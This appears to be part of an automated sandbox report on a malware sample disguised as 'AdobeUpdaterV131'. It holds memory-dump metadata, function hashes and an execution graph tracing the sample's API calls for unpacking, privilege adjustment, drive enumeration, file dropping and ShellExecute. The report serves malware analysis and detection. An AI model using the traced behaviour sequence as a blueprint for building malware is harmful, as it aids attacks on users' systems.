                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy$___std_exception_copy
                                      • String ID: recursive_directory_iterator::operator++
                                      • API String ID: 1206660477-953255998
                                      • Opcode ID: 063f608a302806590a06a6472b4959067e565d40df9fff41f45a0a8f3e331fc0
                                      • Instruction ID: 52f06355fc583b60c117b61211a8feed315226bae62421bebf657757a5e63da0
                                      • Opcode Fuzzy Hash: 063f608a302806590a06a6472b4959067e565d40df9fff41f45a0a8f3e331fc0
                                      • Instruction Fuzzy Hash: 4AE112B09006049FDB28DF68E945BAEB7FAFF44300F10462DE41697B81D774AA44CFA5
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006286DE
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006286ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: at line $, column
                                      • API String ID: 4194217158-191570568
                                      • Opcode ID: a7dce8811d3e0baeae5a90aa45b42bf23fcfc26dda0c780be988d9ad86e738a0
                                      • Instruction ID: af4cfa91af0d8efb8f74963b9d5f809b765f6eed8008371a6e46af1d63773fed
                                      • Opcode Fuzzy Hash: a7dce8811d3e0baeae5a90aa45b42bf23fcfc26dda0c780be988d9ad86e738a0
                                      • Instruction Fuzzy Hash: BA6139719006189FDB08DF68EC857ADBBB7FF45310F14861CE415AB782EB74AA808B95
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00692BD6
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00692BEF
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00692D27
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00692D40
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00692EA6
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00692EBF
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00693709
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00693722
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: value
                                      • API String ID: 4194217158-494360628
                                      • Opcode ID: aa854ad3cde07cdc26f81d40c0dd8b576c3f8c0f97e286816c87d70ba4d20073
                                      • Instruction ID: 62f5f3d121248c7a603ac28b10782aa8a2dd2a75e543570be556288fe4076700
                                      • Opcode Fuzzy Hash: aa854ad3cde07cdc26f81d40c0dd8b576c3f8c0f97e286816c87d70ba4d20073
                                      • Instruction Fuzzy Hash: 3F51A0B0C0025CDBDF14DBA4DD85BDEBBBAAF05304F148258E444AB782D7786A89CB65
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00623C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1866435925
                                      • Opcode ID: 12481fa9e76ae16e028b7130a6e3db3ae8c04ac614941b3456adf055f9a98623
                                      • Instruction ID: 1fa9b41c794cd148eb3a6f220af8350c1d31e1d9dfc12febe7f688af19684415
                                      • Opcode Fuzzy Hash: 12481fa9e76ae16e028b7130a6e3db3ae8c04ac614941b3456adf055f9a98623
                                      • Instruction Fuzzy Hash: 6F1108B2900B286BC710DE58E801B9AB3DDAF15311F04853AFA54DB241F778E954CF95
                                      Strings
                                      • unordered_map/set too long, xrefs: 006921D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: unordered_map/set too long
                                      • API String ID: 0-306623848
                                      • Opcode ID: c63681f2617d5cc9a64a315e65b2fa65241d935ad4fd1bda6769ab114e0f7b4a
                                      • Instruction ID: 86d32aa0fb2c207b51d3f05399d237c835aad2cbebf109ee5dc79911998e9166
                                      • Opcode Fuzzy Hash: c63681f2617d5cc9a64a315e65b2fa65241d935ad4fd1bda6769ab114e0f7b4a
                                      • Instruction Fuzzy Hash: E9E1A271A0010A9FCF18DF68C8919ADB7FAFF49310B248369E9199B795D730ED51CB90
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 0062844D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: parse error$ror
                                      • API String ID: 2659868963-4201802366
                                      • Opcode ID: 581b46b70a7b1a5731d9c5e055c63f7026fff10654424af0fbbcbdb79b79021f
                                      • Instruction ID: 1662b77a4c64a67caaae15256545891aeb9dcdead3e366f558ccbe6b5380e774
                                      • Opcode Fuzzy Hash: 581b46b70a7b1a5731d9c5e055c63f7026fff10654424af0fbbcbdb79b79021f
                                      • Instruction Fuzzy Hash: 5DC1F571D00659CFEB08DFA8DC85BADBBB2BF55300F148258E4046B692DB74AA94CF91
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00628051
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00628060
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: [json.exception.
                                      • API String ID: 4194217158-791563284
                                      • Opcode ID: 6d6bd397fb7a0350d8290fee2e4a386a81cf9ace1aa891162303bce6a345d597
                                      • Instruction ID: 4179cfed7e04723076f0a190ba024ff8999832a1fa8a0aa7a788280f8ee605d2
                                      • Opcode Fuzzy Hash: 6d6bd397fb7a0350d8290fee2e4a386a81cf9ace1aa891162303bce6a345d597
                                      • Instruction Fuzzy Hash: 069119719006189FDB18CFA8DC85BAEBBB2FF55310F14825DE400AB692D7749A84CB91
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00623C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1240500531
                                      • Opcode ID: 53df3f15ee592c4ccf6d01bb30aaf5c1ec0fa7ea1dbebab8a74e4a29b17e22a4
                                      • Instruction ID: 315489ec06993d9eb08d525b4fab4889df42f9efd1115a3d39c97a839d236ad6
                                      • Opcode Fuzzy Hash: 53df3f15ee592c4ccf6d01bb30aaf5c1ec0fa7ea1dbebab8a74e4a29b17e22a4
                                      • Instruction Fuzzy Hash: E44127B1900628ABC704DF58DC41BAEF7BAEF55310F14822EF91497781E778AA40CFA5
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006940B9
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006940D2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00694BDD
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00694BF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: value
                                      • API String ID: 4194217158-494360628
                                      • Opcode ID: 2e8cf18357439bc81d28b4c1953487916432a2bce39ecdd2fab9c2aa6a45c138
                                      • Instruction ID: 3312fb88e63edb09d661ab9f7e5ed4a16a28a60862273a2cde1c92e0a065a599
                                      • Opcode Fuzzy Hash: 2e8cf18357439bc81d28b4c1953487916432a2bce39ecdd2fab9c2aa6a45c138
                                      • Instruction Fuzzy Hash: 4551C2B0C0025CDFDF14DFA4DC89BDEBBBAAF05304F144259E444A7782DB746A898B55
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00698D11
                                      Strings
                                      • type must be boolean, but is , xrefs: 00698E02
                                      • type must be string, but is , xrefs: 00698D78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID: type must be boolean, but is $type must be string, but is
                                      • API String ID: 118556049-436076039
                                      • Opcode ID: 724a68699e84270ee038d77b8bdf17951564d832409072194cfc06717730b5c3
                                      • Instruction ID: c1cb55265ad708edea5956b88232906d6c445fc555343ab73ba35de05b9dfedd
                                      • Opcode Fuzzy Hash: 724a68699e84270ee038d77b8bdf17951564d832409072194cfc06717730b5c3
                                      • Instruction Fuzzy Hash: E23129B1900248AFCB14EB94D842B9DB7AEEF11300F10066CF515D7B86EF79AA48C796

                                      Execution Graph

                                      Execution Coverage:28.6%
                                      Dynamic/Decrypted Code Coverage:10.4%
                                      Signature Coverage:16.5%
                                      Total number of Nodes:297
                                      Total number of Limit Nodes:10
                                      execution_graph 1342 4e6159 1343 4e615f VirtualFree 1342->1343 1350 4e60c7 1343->1350 1344 4e6198 VirtualFree 1352 4e61b2 1344->1352 1345 4e60d5 VirtualAlloc 1345->1350 1346 4e6389 VirtualProtect 1349 4e63b7 1346->1349 1347 4e63fc VirtualProtect 1348 4e6400 1347->1348 1349->1347 1351 4e63e7 VirtualProtect 1349->1351 1350->1343 1350->1344 1350->1345 1351->1347 1351->1349 1352->1346 1353 4e62fb 1352->1353 1026 4e6076 1027 4e607b 1026->1027 1032 4e60c7 1026->1032 1029 4e60b0 VirtualAlloc 1027->1029 1027->1032 1038 4e61b2 1027->1038 1028 4e615f VirtualFree 1028->1032 1029->1032 1030 4e6198 VirtualFree 1030->1038 1031 4e60d5 VirtualAlloc 1031->1032 1032->1028 1032->1030 1032->1031 1033 4e6389 VirtualProtect 1036 4e63b7 1033->1036 1034 4e63fc VirtualProtect 1035 4e6400 1034->1035 1036->1034 1037 4e63e7 VirtualProtect 1036->1037 1037->1034 1037->1036 1038->1033 1039 4e62fb 1038->1039 1354 4e6014 1355 4e6035 GetModuleHandleA 1354->1355 1356 4e605f 1354->1356 1357 4e604d 6CC16DE0 1355->1357 1358 4e6058 1357->1358 1358->1356 1358->1357 1358->1358 1040 4e14e1 1041 4e14fd GetModuleHandleA 1040->1041 1042 4e1541 1040->1042 1044 4e151a VirtualQuery 1041->1044 1048 4e1512 1041->1048 1043 4e1573 1042->1043 1045 4e1549 1042->1045 1051 4e1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1043->1051 1044->1048 1046 4e1566 1045->1046 1068 4e1af9 1045->1068 1048->1042 1049 4e1579 ExitProcess 1052 4e167f 1051->1052 1053 4e167a 1051->1053 1074 4e1718 GetSystemTimeAsFileTime 1052->1074 1086 4e139f GetVersionExA 1053->1086 1056 4e1686 1057 4e16ca 1056->1057 1060 4e16a0 CreateThread 1056->1060 1058 4e16d7 1057->1058 1059 4e16d0 1057->1059 1062 4e170f 1058->1062 1063 4e16dd lstrcpy 1058->1063 1107 4e1581 1059->1107 1079 4e2c48 memset 1060->1079 1322 4e1099 1060->1322 1062->1049 1063->1049 1067 4e1718 3 API calls 1067->1057 1069 4e1b09 1068->1069 1070 4e1b11 1068->1070 1071 4e1638 177 API calls 1069->1071 1072 4e1b16 CreateThread 1070->1072 1073 4e1b0f 1070->1073 1071->1073 1072->1073 1341 4e1638 178 API calls 1072->1341 1073->1046 1073->1073 1075 4e1754 1074->1075 1076 4e1735 SHSetValueA 1074->1076 1077 4e175a SHGetValueA 1075->1077 1078 4e1786 __aulldiv 1075->1078 1076->1078 1077->1078 1078->1056 1114 4e1973 PathFileExistsA 1079->1114 1082 4e2cb2 1084 4e2cbb VirtualFree 1082->1084 1085 4e16ba WaitForSingleObject 1082->1085 1083 4e2c8f CreateThread WaitForMultipleObjects 1083->1082 1134 4e2b8c memset GetLogicalDriveStringsA 1083->1134 1084->1085 1085->1067 1087 4e13cf LookupPrivilegeValueA 1086->1087 1088 4e14da 1086->1088 1089 4e13e7 1087->1089 1090 4e13ef 1087->1090 1088->1052 1302 4e119f GetCurrentProcess OpenProcessToken 1089->1302 1090->1088 1307 4e120e GetModuleHandleA 6CC16DE0 1090->1307 1096 4e1448 GetCurrentProcessId 1096->1088 1097 4e1457 1096->1097 1097->1088 1098 4e1319 3 API calls 1097->1098 1099 4e147f 1098->1099 1100 4e1319 3 API calls 1099->1100 1101 4e148e 1100->1101 1101->1088 1102 4e1319 3 API calls 1101->1102 1103 4e14b4 1102->1103 1104 4e1319 3 API calls 1103->1104 1105 4e14c3 1104->1105 1106 4e1319 3 API calls 1105->1106 1106->1088 1321 4e185b GetSystemTimeAsFileTime srand rand srand rand 1107->1321 1109 4e1592 wsprintfA wsprintfA lstrlen 1110 4e15f4 1109->1110 1111 4e15fb WriteFile CloseHandle 1110->1111 1112 4e1633 1110->1112 1111->1112 1113 4e161d ShellExecuteA 1111->1113 1112->1062 1113->1112 1115 4e19a0 1114->1115 1116 4e1ac7 1114->1116 1117 4e19af CreateFileA 1115->1117 1116->1082 1116->1083 1118 4e1a28 GetFileSize 1117->1118 1119 4e19c4 Sleep 1117->1119 1120 4e1a38 1118->1120 1128 4e1a80 1118->1128 1119->1117 1121 4e19d5 1119->1121 1122 4e1a3d VirtualAlloc 1120->1122 1120->1128 1133 4e185b GetSystemTimeAsFileTime srand rand srand rand 1121->1133 1122->1128 1129 4e1a53 1122->1129 1123 4e1a8d 